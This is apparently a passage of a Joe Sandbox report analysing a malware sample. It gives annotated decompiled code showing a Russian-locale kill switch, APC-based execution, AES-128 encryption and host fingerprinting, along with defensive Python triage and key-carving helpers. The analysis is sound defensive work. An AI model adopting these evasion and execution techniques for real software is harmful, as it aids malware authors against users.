                                                     				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed; LOCALE_USER_DEFAULT, LOCALE_SISO3166CTRYNAME: two-letter country code into _v12
                                                     				if(_t33 == 0) {
                                                     					__imp__GetSystemDefaultUILanguage(); // fallback if the locale query fails
                                                     					_t67 =  &_v12;
                                                     					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
                                                     				}
                                                     				if(_v12 == 0x5552) { // bytes 52 55 00 00 == "RU": skip the payload and return on a Russian locale
                                                     					L28:
                                                     					_t31 = _v8;
                                                     					if(_t31 == 0xffffffff) {
                                                     						_t31 = GetLastError();
                                                     					}
                                                     					goto L30;
                                                     				} else {
                                                     					if(E0040135E(_t67,  &_v16) != 0) {
                                                     						 *0x403178 = 0;
                                                     						L20:
                                                     						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x403180, 0, 0); // executed; SleepEx itself is the start routine, *0x403180 its timeout
                                                     						_t82 = _t37;
                                                     						if(_t82 == 0) {
                                                     							L27:
                                                     							_v8 = GetLastError();
                                                     							goto L28;
                                                     						}
                                                     						_t40 = QueueUserAPC(E00401E51, _t82,  &_v40); // executed; the real work (E00401E51) runs as an APC inside the sleeping thread
                                                     						if(_t40 == 0) {
                                                     							_t65 = GetLastError();
                                                     							TerminateThread(_t82, _t65);
                                                     							CloseHandle(_t82);
                                                     							_t82 = 0;
                                                     							SetLastError(_t65);
                                                     						}
                                                     						if(_t82 == 0) {
                                                     							goto L27;
                                                     						} else {
                                                     							_t41 = WaitForSingleObject(_t82, 0xffffffff); // INFINITE: block until the APC thread finishes
                                                     							_v8 = _t41;
                                                     							if(_t41 == 0) {
                                                     								GetExitCodeThread(_t82,  &_v8); // the thread's exit code becomes this function's result
                                                     							}
                                                     							CloseHandle(_t82);
                                                     							goto L28;
                                                     						}
                                                     					}
                                                     					_t66 = _v16; // wide-string path produced by E0040135E
                                                     					_t83 = __imp__GetLongPathNameW;
                                                     					_t48 =  *_t83(_t66, 0, 0); // executed; first call: required length
                                                     					_t75 = _t48;
                                                     					if(_t75 == 0) {
                                                     						L18:
                                                     						 *0x403178 = _t66; // keep the original path if it cannot be expanded
                                                     						goto L20;
                                                     					}
                                                     					_t22 = _t75 + 2; // 0x2
                                                     					_t50 = E00401F0B(_t75 + _t22); // allocate 2 * len + 2 bytes for the long form
                                                     					 *0x403178 = _t50;
                                                     					if(_t50 == 0) {
                                                     						goto L18;
                                                     					}
                                                     					 *_t83(_t66, _t50, _t75); // executed; second call: fill the buffer
                                                     					E004013E6(_t66);
                                                     					goto L20;
                                                     				}
                                                     			}

                                                     Address range of the listing above: 0x0040117e - 0x0040132f (the report's per-statement address column is not reproduced here)

                                                    APIs
                                                      • Part of subcall function 00401D96: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401183), ref: 00401DA5
                                                      • Part of subcall function 00401D96: GetVersion.KERNEL32 ref: 00401DB4
                                                      • Part of subcall function 00401D96: GetCurrentProcessId.KERNEL32 ref: 00401DD0
                                                      • Part of subcall function 00401D96: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DE9
                                                      • Part of subcall function 00401F0B: RtlAllocateHeap.NTDLL(00000000,?,0040119F,00000030,?,00000000), ref: 00401F17
                                                    • NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004011AD
                                                    • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 004011F4
                                                    • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 0040121C
                                                    • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401226
                                                    • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401239
                                                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401266
                                                    • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401284
                                                    • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004012AE
                                                    • QueueUserAPC.KERNELBASE(00401E51,00000000,?,?,00000000), ref: 004012C4
                                                    • GetLastError.KERNEL32(?,00000000), ref: 004012D4
                                                    • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 004012DE
                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 004012E5
                                                    • SetLastError.KERNEL32(00000000,?,00000000), ref: 004012EA
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 004012F7
                                                    • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401309
                                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401310
                                                    • GetLastError.KERNEL32(?,00000000), ref: 00401314
                                                    • GetLastError.KERNEL32(?,00000000), ref: 00401325
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                     • Associated: 00000007.00000002.819938819.0000000000404000.00000040.00000400.00020000.00000000.sdmp
                                                     • Associated: 00000007.00000002.819938819.0000000000406000.00000040.00000400.00020000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_400000_maintainabovl.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
                                                    • String ID:
                                                    • API String ID: 3475612337-0
                                                    • Opcode ID: fbdb15a310026681de5c045a80113a0e0a4c12016e4f715f74ae31f5e8c14a74
                                                    • Instruction ID: c9965e1650b5d58896470e9fbb4011aa6c645074773e2c643f1b96b1ebd5facb
                                                    • Opcode Fuzzy Hash: fbdb15a310026681de5c045a80113a0e0a4c12016e4f715f74ae31f5e8c14a74
                                                    • Instruction Fuzzy Hash: 2051C871900215BBE711ABB59E489AF7B7CEB45754F104077FA01F72E0D7788A00CB69
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%
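The two behaviours worth pulling out of E00401178 are the country check (GetLocaleInfoA with LOCALE_USER_DEFAULT = 0x400 and LOCALE_SISO3166CTRYNAME = 0x5A, compared against the DWORD 0x5552, which is the bytes "RU") and the thread started on SleepEx with the real routine queued via QueueUserAPC. The script below is an added triage example, not part of the Joe Sandbox report or of the sample: it parses the report's own "APIs" listing format, decodes the comparison constant, and flags both patterns. The locale constants are from the Windows SDK headers; the CreateThread-followed-by-QueueUserAPC adjacency rule is an assumption of this example (the SleepEx start routine is visible only in the decompiled listing, the API list shows that argument as 00000000), and the sample lines are copied from the APIs list above.

```python
import re
import struct

# Constants from the listing: GetLocaleInfoA(0x400, 0x5A, &buf, 4)
LOCALE_USER_DEFAULT = 0x0400
LOCALE_SISO3166CTRYNAME = 0x5A  # two-letter ISO-3166 country code

# One line of the report's "APIs" list. Both forms occur:
#   • GetVersion.KERNEL32 ref: 00401DB4
#   • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DE9
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)


def _arg(token):
    """'00000400' -> 0x400; '?' (value not resolved by the sandbox) -> None."""
    token = token.strip()
    return None if token == "?" else int(token, 16)


def parse_api_lines(text):
    """Return the listing as a list of dicts, in report order."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue  # headings such as 'APIs', blank lines
        args = m.group("args")
        calls.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": [_arg(a) for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
            "subcall": int(m.group("sub"), 16) if m.group("sub") else None,
        })
    return calls


def country_from_dword(value):
    """Decode the 4-byte buffer GetLocaleInfoA filled, read back as a
    little-endian DWORD: 0x5552 is the bytes 52 55 00 00, i.e. 'RU'."""
    return struct.pack("<I", value).rstrip(b"\0").decode("ascii")


def find_country_checks(calls):
    """GetLocaleInfoA asking for the ISO-3166 code of the user locale."""
    return [c["ref"] for c in calls
            if c["api"] == "GetLocaleInfoA"
            and c["args"][:2] == [LOCALE_USER_DEFAULT, LOCALE_SISO3166CTRYNAME]]


def find_apc_thread_starts(calls):
    """Heuristic (assumption of this example): CreateThread immediately
    followed by QueueUserAPC in the function's own calls means the thread is
    parked and the real work runs as an APC.  Returns
    (CreateThread ref, QueueUserAPC ref, APC routine address)."""
    own = [c for c in calls if c["subcall"] is None]
    hits = []
    for prev, cur in zip(own, own[1:]):
        if prev["api"] == "CreateThread" and cur["api"] == "QueueUserAPC":
            hits.append((prev["ref"], cur["ref"], cur["args"][0]))
    return hits


# Sample input: lines copied from the report's APIs list for E00401178.
SAMPLE = """
  • Part of subcall function 00401D96: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401183), ref: 00401DA5
  • Part of subcall function 00401D96: GetVersion.KERNEL32 ref: 00401DB4
• NtQuerySystemInformation.NTDLL(00000008,00000000,00000030,?), ref: 004011AD
• Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 004011F4
• GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 0040121C
• GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401226
• VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401239
• CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 004012AE
• QueueUserAPC.KERNELBASE(00401E51,00000000,?,?,00000000), ref: 004012C4
• GetLastError.KERNEL32(?,00000000), ref: 004012D4
• WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 004012F7
"""

if __name__ == "__main__":
    calls = parse_api_lines(SAMPLE)
    print("country check at", [hex(r) for r in find_country_checks(calls)],
          "compared against", repr(country_from_dword(0x5552)))
    for ct, apc, routine in find_apc_thread_starts(calls):
        print(f"CreateThread @{ct:08x} then QueueUserAPC @{apc:08x} -> APC routine {routine:08x}")
```

Run against the listing above it reports the country check at 0x0040121C with the constant decoding to "RU", and the CreateThread at 0x004012AE followed by QueueUserAPC at 0x004012C4 targeting E00401E51. Lines prefixed "Part of subcall function" are kept in the parse (with the callee address) but excluded from the adjacency rule, so calls made inside E00401D96 cannot be paired with the function's own calls.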

                                                     Control-flow Graph

                                                     Basic blocks from the graph data (block id, address range, calls made in the block, successors); the executed / not-executed colouring of the report's image is not reproduced. Blocks 133-140 form the loop around memcpy / CryptEncrypt (140 -> 133 is the back edge):
                                                     • 113 10952f6-1095336 CryptAcquireContextW -> 114, 115
                                                     • 114 109548d-1095493 -> 121
                                                     • 115 109533c-1095378 memcpy CryptImportKey -> 116, 117
                                                     • 116 1095478-109547e -> 127
                                                     • 117 109537e-1095390 CryptSetKeyParam -> 118, 119
                                                     • 118 1095464-109546a -> 130
                                                     • 119 1095396-109539f -> 123, 124
                                                     • 121 1095496-109549d (no successors)
                                                     • 123 10953a1-10953a3 -> 124, 128
                                                     • 124 10953a7-10953b4 call 1096a51 -> 131, 132
                                                     • 127 1095481-109548b CryptReleaseContext -> 121
                                                     • 128 10953a5 -> 124
                                                     • 130 109546d-1095476 CryptDestroyKey -> 127
                                                     • 131 109545b-1095462 -> 130
                                                     • 132 10953ba-10953c3 -> 133
                                                     • 133 10953c6-10953ce -> 134, 135
                                                     • 134 10953d0 -> 135
                                                     • 135 10953d3-10953f0 memcpy -> 136, 137
                                                     • 136 109540b-1095417 -> 138
                                                     • 137 10953f2-1095409 CryptEncrypt -> 138
                                                     • 138 1095420-1095422 -> 139, 140
                                                     • 139 1095432-109543d -> 142, 144
                                                     • 140 1095424-109542e -> 133, 141
                                                     • 141 1095430 -> 142
                                                     • 142 109543f-109544f -> 130
                                                     • 144 1095451-1095459 call 109692b -> 130
                                                    C-Code - Quality: 50%
                                                    			E010952F6(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                    				int _v8;
                                                    				long* _v12;
                                                    				int _v16;
                                                    				void* _v20;
                                                    				long* _v24;
                                                    				void* _v39;
                                                    				char _v40;
                                                    				void _v56;
                                                    				int _v60;
                                                    				intOrPtr _v64;
                                                    				void _v67;
                                                    				char _v68;
                                                    				void* _t61;
                                                    				int _t68;
                                                    				signed int _t76;
                                                    				int _t79;
                                                    				int _t81;
                                                    				void* _t85;
                                                    				long _t86;
                                                    				int _t90;
                                                    				signed int _t94;
                                                    				int _t101;
                                                    				void* _t102;
                                                    				int _t103;
                                                    				void* _t104;
                                                    				void* _t105;
                                                    				void* _t106;
                                                    
                                                    				_t103 = __eax;
                                                    				_t94 = 6;
                                                    				_v68 = 0;
                                                    				memset( &_v67, 0, _t94 << 2);
                                                    				_t105 = _t104 + 0xc;
                                                    				asm("stosw");
                                                    				asm("stosb");
                                                    				_v40 = 0;
                                                    				asm("stosd");
                                                    				asm("stosd");
                                                    				asm("stosd");
                                                    				asm("stosw");
                                                    				asm("stosb");
                                                    				_t61 =  *0x109a0e8( &_v24, 0, 0, 0x18, 0xf0000000); // executed; CryptAcquireContextW(&hProv, NULL, NULL, PROV_RSA_AES (0x18), CRYPT_VERIFYCONTEXT (0xF0000000)) called through the 0x109a0e8 import slot
                                                    				if(_t61 == 0) {
                                                    					_a8 = GetLastError();
                                                    				} else {
                                                    					_t101 = 0x10;
                                                    					memcpy( &_v56, _a8, _t101); // the caller's 16-byte key (_a8) becomes the blob body
                                                    					_t106 = _t105 + 0xc;
                                                    					_v60 = _t101; // PLAINTEXTKEYBLOB.dwKeySize = 0x10, i.e. AES-128
                                                    					_v67 = 2; // BLOBHEADER.bVersion = CUR_BLOB_VERSION
                                                    					_v64 = 0x660e; // BLOBHEADER.aiKeyAlg = CALG_AES_128
                                                    					_v68 = 8; // BLOBHEADER.bType = PLAINTEXTKEYBLOB
                                                    					_t68 = CryptImportKey(_v24,  &_v68, 0x1c, 0, 0,  &_v12); // executed; 0x1c = 12-byte header + 16-byte key, the whole blob sits on the stack from _v68 up
                                                    					if(_t68 == 0) {
                                                    						_a8 = GetLastError();
                                                    					} else {
                                                    						_push(0);
                                                    						_push( &_v40); // the 16 bytes zeroed above
                                                    						_push(1); // KP_IV
                                                    						_push(_v12);
                                                    						if( *0x109a0e4() == 0) { // CryptSetKeyParam(hKey, KP_IV, &_v40, 0): all-zero IV; the mode is CryptoAPI's default CBC, so the key drives AES-128-CBC with IV = 0
                                                    							_a8 = GetLastError();
                                                    						} else {
                                                    							_t18 = _t103 + 0xf; // 0x10
                                                    							_t76 = _t18 & 0xfffffff0; // output length rounded up to a 16-byte block
                                                    							if(_a4 != 0 && _t76 == _t103) {
                                                    								_t76 = _t76 + _t101; // encrypting an already block-aligned input: one more block for the padding CryptEncrypt appends on the Final call
                                                    							}
                                                    							_t102 = E01096A51(_t76);
                                                    							_v20 = _t102;
                                                    							if(_t102 == 0) {
                                                    								_a8 = 8; // ERROR_NOT_ENOUGH_MEMORY when the allocator E01096A51 fails
                                                    							} else {
                                                    								_v16 = 0;
                                                    								_a8 = 0;
                                                    								while(1) {
                                                    									_t79 = 0x10;
                                                    									_v8 = _t79;
                                                    									if(_t103 <= _t79) {
                                                    										_v8 = _t103;
                                                    									}
                                                    									memcpy(_t102, _a12, _v8);
                                                    									_t81 = _v8;
                                                    									_a12 = _a12 + _t81;
                                                    									_t103 = _t103 - _t81;
                                                    									_t106 = _t106 + 0xc;
                                                    									if(_a4 == 0) {
                                                    										_t85 =  *0x109a0a8(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8); // unresolved slot, six arguments shaped like CryptDecrypt(hKey, 0, Final, 0, pbData, pdwDataLen); not exercised in this run
                                                    									} else {
                                                    										_t85 =  *0x109a0c0(_v12, 0, 0 | _t103 == 0x00000000, 0, _t102,  &_v8, 0x20); // CryptEncrypt(hKey, 0, Final, 0, pbData, pdwDataLen, dwBufLen = 0x20); Final is set on the last 16-byte chunk, when the padded block may grow to 32 bytes
                                                    									}
                                                    									if(_t85 == 0) {
                                                    										break;
                                                    									}
                                                    									_t90 = _v8;
                                                    									_v16 = _v16 + _t90;
                                                    									_t102 = _t102 + _t90;
                                                    									if(_t103 != 0) {
                                                    										continue;
                                                    									} else {
                                                    										L17:
                                                    										 *_a16 = _v20;
                                                    										 *_a20 = _v16;
                                                    									}
                                                    									goto L21;
                                                    								}
                                                    								_t86 = GetLastError();
                                                    								_a8 = _t86;
                                                    								if(_t86 != 0) {
                                                    									E0109692B(_v20);
                                                    								} else {
                                                    									goto L17;
                                                    								}
                                                    							}
                                                    						}
                                                    						L21:
                                                    						CryptDestroyKey(_v12);
                                                    					}
                                                    					CryptReleaseContext(_v24, 0);
                                                    				}
                                                    				return _a8; // Win32 error code, 0 on success; the result buffer and its length were stored through _a16 / _a20
                                                    			}
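The CryptoAPI usage in E010952F6, reconstructed as a Python helper. This is an added example, not code from the sample or from the Joe Sandbox report: it builds and parses the 0x1c-byte PLAINTEXTKEYBLOB the function assembles on its stack (bType 8, bVersion 2, CALG_AES_128, dwKeySize 0x10, raw key), scans a memory dump for that fixed 12-byte header to carve AES-128 keys, mirrors the output-size computation performed before the call into E01096A51, and applies the resulting cipher. Assumptions, all labelled in the code: that the unresolved 0x109a0a8 slot is CryptDecrypt, that CryptoAPI's default CBC mode and PKCS#7 padding apply because the function only sets KP_IV, and that the function names and the sample dump are constructed here. The `aes128_cbc_zero_iv` helper needs the third-party `cryptography` package; everything else is standard library only.

```python
"""Helpers for the CryptoAPI AES-128 pattern in E010952F6 (added example, not the sample's code)."""
import struct

# Constants from wincrypt.h; the decompiled function stores exactly these values.
PLAINTEXTKEYBLOB = 0x08   # BLOBHEADER.bType   (_v68 = 8)
CUR_BLOB_VERSION = 0x02   # BLOBHEADER.bVersion (_v67 = 2)
CALG_AES_128 = 0x660E     # BLOBHEADER.aiKeyAlg (_v64 = 0x660e)
AES_BLOCK = 16            # dwKeySize (_v60 = 0x10) and the chunk size of the loop

# bType, bVersion, reserved WORD, aiKeyAlg (ALG_ID), dwKeySize: 12 bytes
_HDR = struct.Struct("<BBHII")
BLOB_LEN = _HDR.size + AES_BLOCK   # 0x1c, the length passed to CryptImportKey

# Every such blob starts with this fixed prefix; it is a usable memory-dump signature.
BLOB_SIGNATURE = _HDR.pack(PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, CALG_AES_128, AES_BLOCK)


def build_plaintext_aes128_blob(key: bytes) -> bytes:
    """Lay the blob out as the sample does: header, dwKeySize = 0x10, then the raw key."""
    if len(key) != AES_BLOCK:
        raise ValueError("AES-128 key must be 16 bytes")
    return BLOB_SIGNATURE + key


def parse_plaintext_aes128_blob(blob: bytes) -> bytes:
    """Validate a candidate blob and return the raw key it carries."""
    if len(blob) < BLOB_LEN:
        raise ValueError("blob too short")
    fields = _HDR.unpack_from(blob)
    if fields != (PLAINTEXTKEYBLOB, CUR_BLOB_VERSION, 0, CALG_AES_128, AES_BLOCK):
        raise ValueError("not a PLAINTEXTKEYBLOB for CALG_AES_128")
    return blob[_HDR.size:BLOB_LEN]


def carve_aes128_keys(dump: bytes) -> list:
    """Scan a memory dump for the blob header and return (offset, key) pairs."""
    hits = []
    pos = dump.find(BLOB_SIGNATURE)
    while pos != -1 and pos + BLOB_LEN <= len(dump):
        hits.append((pos, dump[pos + _HDR.size:pos + BLOB_LEN]))
        pos = dump.find(BLOB_SIGNATURE, pos + 1)
    return hits


def output_buffer_size(length: int, encrypt: bool) -> int:
    """Mirror the sizing done before E01096A51: round up to a 16-byte block and,
    when encrypting an input that is already block-aligned, add one more block
    for the padding CryptEncrypt appends on the Final call."""
    size = (length + 0xF) & ~0xF
    if encrypt and size == length:
        size += AES_BLOCK
    return size


def aes128_cbc_zero_iv(key: bytes, data: bytes, encrypt: bool) -> bytes:
    """The cipher the imported key drives: AES-128-CBC, IV = 16 zero bytes (KP_IV set
    to the zeroed _v40), PKCS#7 padding. Assumes CryptoAPI's default CBC mode and that
    the 0x109a0a8 slot is CryptDecrypt. Requires the third-party 'cryptography' package."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
    cipher = Cipher(algorithms.AES(key), modes.CBC(bytes(AES_BLOCK)))
    if encrypt:
        padder = padding.PKCS7(128).padder()
        padded = padder.update(data) + padder.finalize()
        enc = cipher.encryptor()
        return enc.update(padded) + enc.finalize()
    dec = cipher.decryptor()
    plain = dec.update(data) + dec.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return unpadder.update(plain) + unpadder.finalize()


if __name__ == "__main__":
    # Constructed sample: junk bytes around one key blob, standing in for a process dump.
    key = bytes(range(0x41, 0x51))
    dump = b"\x00" * 37 + build_plaintext_aes128_blob(key) + b"\xff" * 11
    for off, k in carve_aes128_keys(dump):
        print(f"PLAINTEXTKEYBLOB at 0x{off:x}: key={k.hex()}")
    print(output_buffer_size(32, encrypt=True), output_buffer_size(32, encrypt=False))
```

Carving by the 12-byte header finds keys only while the blob is still on the stack of E010952F6 or in a buffer the caller kept; a dump taken after CryptReleaseContext may hold just the imported key object, which this signature does not match.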

                                                    APIs
                                                    • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,01095DD6,00000001,0109384E,00000000), ref: 0109532E
                                                    • memcpy.NTDLL(01095DD6,0109384E,00000010,?,?,?,01095DD6,00000001,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740), ref: 01095347
                                                    • CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 01095370
                                                    • CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 01095388
                                                    • memcpy.NTDLL(00000000,775EC740,01B09600,00000010), ref: 010953DA
                                                    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,00000000,00000000,01B09600,00000020,?,?,00000010), ref: 01095403
                                                    • GetLastError.KERNEL32(?,?,00000010), ref: 01095432
                                                    • GetLastError.KERNEL32 ref: 01095464
                                                    • CryptDestroyKey.ADVAPI32(00000000), ref: 01095470
                                                    • GetLastError.KERNEL32 ref: 01095478
                                                    • CryptReleaseContext.ADVAPI32(?,00000000), ref: 01095485
                                                    • GetLastError.KERNEL32(?,?,?,01095DD6,00000001,0109384E,00000000,?,01095881,00000000,0109384E,?,775EC740,0109384E,00000000,01B09600), ref: 0109548D
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: Crypt$ErrorLast$Contextmemcpy$AcquireDestroyEncryptImportParamRelease
                                                    • String ID: @MqtNqt
                                                    • API String ID: 3401600162-2883916605
                                                    • Opcode ID: a4aae5d0d280d06f7eac1a6a25a69096ef3b3998f4337caea50852fc70b49c48
                                                    • Instruction ID: 29dbdfcb0b8411f965899e58d9c64376d3c1321fe7f4adab763647d3d0d94977
                                                    • Opcode Fuzzy Hash: a4aae5d0d280d06f7eac1a6a25a69096ef3b3998f4337caea50852fc70b49c48
                                                    • Instruction Fuzzy Hash: 9A517C71A00208FFDF51DFA9DC94AEE7BB8FB44344F00846AF995E6140D7758A14EB21
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 236 1095710-1095724 237 109572e-1095740 call 1095208 236->237 238 1095726-109572b 236->238 241 1095742-1095752 GetUserNameW 237->241 242 1095794-10957a1 237->242 238->237 243 10957a3-10957ba GetComputerNameW 241->243 244 1095754-1095764 RtlAllocateHeap 241->244 242->243 245 10957f8-109581c 243->245 246 10957bc-10957cd RtlAllocateHeap 243->246 244->243 247 1095766-1095773 GetUserNameW 244->247 246->245 248 10957cf-10957d8 GetComputerNameW 246->248 249 1095783-1095792 247->249 250 1095775-1095781 call 1095e1e 247->250 251 10957e9-10957ec 248->251 252 10957da-10957e6 call 1095e1e 248->252 249->243 250->249 251->245 252->251
                                                    C-Code - Quality: 96%
                                                    			E01095710(char __eax, void* __esi) {
                                                    				long _v8;
                                                    				char _v12;
                                                    				signed int _v16;
                                                    				signed int _v20;
                                                    				signed int _v28;
                                                    				long _t34;
                                                    				signed int _t39;
                                                    				long _t50;
                                                    				char _t59;
                                                    				intOrPtr _t61;
                                                    				void* _t62;
                                                    				void* _t64;
                                                    				char _t65;
                                                    				intOrPtr* _t67;
                                                    				void* _t68;
                                                    				void* _t69;
                                                    
                                                    				_t69 = __esi; // esi: 16-byte output block (four dwords) that the host-specific values are XORed into
                                                    				_t65 = __eax; // eax: optional caller-supplied seed; 0 selects the user-name path below
                                                    				_v8 = 0;
                                                    				_v12 = __eax;
                                                    				if(__eax == 0) {
                                                    					_t59 =  *0x109a310; // 0xd448b889, global default seed used when the caller passes eax == 0
                                                    					_v12 = _t59;
                                                    				}
                                                    				_t64 = _t69;
                                                    				E01095208( &_v12, _t64);
                                                    				if(_t65 != 0) {
                                                    					 *_t69 =  *_t69 ^  *0x109a344 ^ 0x46d76429; // caller supplied a seed: mix a global and a constant into dword 0 instead of the user name
                                                    				} else {
                                                    					GetUserNameW(0,  &_v8); // executed; NULL buffer, so this only returns the required length in WCHARs through _v8
                                                    					_t50 = _v8;
                                                    					if(_t50 != 0) {
                                                    						_t62 = RtlAllocateHeap( *0x109a2d8, 0, _t50 + _t50); // length * sizeof(WCHAR)
                                                    						if(_t62 != 0) {
                                                    							if(GetUserNameW(_t62,  &_v8) != 0) {
                                                    								_t64 = _t62;
                                                    								 *_t69 =  *_t69 ^ E01095E1E(_v8 + _v8, _t64); // E01095E1E(byte length, buffer) yields a 32-bit value, presumably a hash of the user name, XORed into dword 0
                                                    							}
                                                    							HeapFree( *0x109a2d8, 0, _t62);
                                                    						}
                                                    					}
                                                    				}
                                                    				_t61 = __imp__;
                                                    				_v8 = _v8 & 0x00000000;
                                                    				GetComputerNameW(0,  &_v8);
                                                    				_t34 = _v8;
                                                    				if(_t34 != 0) {
                                                    					_t68 = RtlAllocateHeap( *0x109a2d8, 0, _t34 + _t34);
                                                    					if(_t68 != 0) {
                                                    						if(GetComputerNameW(_t68,  &_v8) != 0) {
                                                    							_t64 = _t68;
                                                    							 *(_t69 + 0xc) =  *(_t69 + 0xc) ^ E01095E1E(_v8 + _v8, _t64); // same routine over the computer name, XORed into dword 3
                                                    						}
                                                    						HeapFree( *0x109a2d8, 0, _t68);
                                                    					}
                                                    				}
                                                    				asm("cpuid");
                                                    				_t67 =  &_v28; // the stores below are the cpuid result registers; the decompiler has lost their names, and the 1 is most likely the leaf number loaded into eax before the instruction
                                                    				 *_t67 = 1;
                                                    				 *((intOrPtr*)(_t67 + 4)) = _t61;
                                                    				 *((intOrPtr*)(_t67 + 8)) = 0;
                                                    				 *(_t67 + 0xc) = _t64;
                                                    				_t39 = _v16 ^ _v20 ^ _v28; // fold three of the cpuid output dwords
                                                    				 *(_t69 + 4) =  *(_t69 + 4) ^ _t39; // into dword 1; dwords 0, 1 and 3 of the block now depend on user name, CPU and computer name respectively
                                                    				return _t39;
                                                    			}

                                                    APIs
                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 01095747
                                                    • RtlAllocateHeap.NTDLL(00000000,?), ref: 0109575E
                                                    • GetUserNameW.ADVAPI32(00000000,?), ref: 0109576B
                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 0109578C
                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 010957B3
                                                    • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 010957C7
                                                    • GetComputerNameW.KERNEL32(00000000,00000000), ref: 010957D4
                                                    • HeapFree.KERNEL32(00000000,00000000), ref: 010957F2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000007.00000002.820639800.0000000001091000.00000020.10000000.00040000.00000000.sdmp, Offset: 01090000, based on PE: true
                                                    • Associated: 00000007.00000002.820587968.0000000001090000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820748616.0000000001099000.00000002.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820798718.000000000109A000.00000004.10000000.00040000.00000000.sdmp
                                                    • Associated: 00000007.00000002.820863616.000000000109C000.00000002.10000000.00040000.00000000.sdmp
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_7_2_1090000_maintainabovl.jbxd
                                                    Similarity
                                                    • API ID: HeapName$AllocateComputerFreeUser
                                                    • String ID: Uqt
                                                    • API String ID: 3239747167-2320327147
                                                    • Opcode ID: 6ff0c5ca1c40882fac6b364fd26eaf51d1e58018efb7e1cf86eb5cda0e60eb11
                                                    • Instruction ID: 8c029e7f37693115ed4f987bb3014048b7fb858ac8321a3e9aefa743e17d0a0b
                                                    • Opcode Fuzzy Hash: 6ff0c5ca1c40882fac6b364fd26eaf51d1e58018efb7e1cf86eb5cda0e60eb11
                                                    • Instruction Fuzzy Hash: 35315071A00205EFDB21DFAADC91A6EFBF9FF48300F10406AE595D3250D735DA01AB20
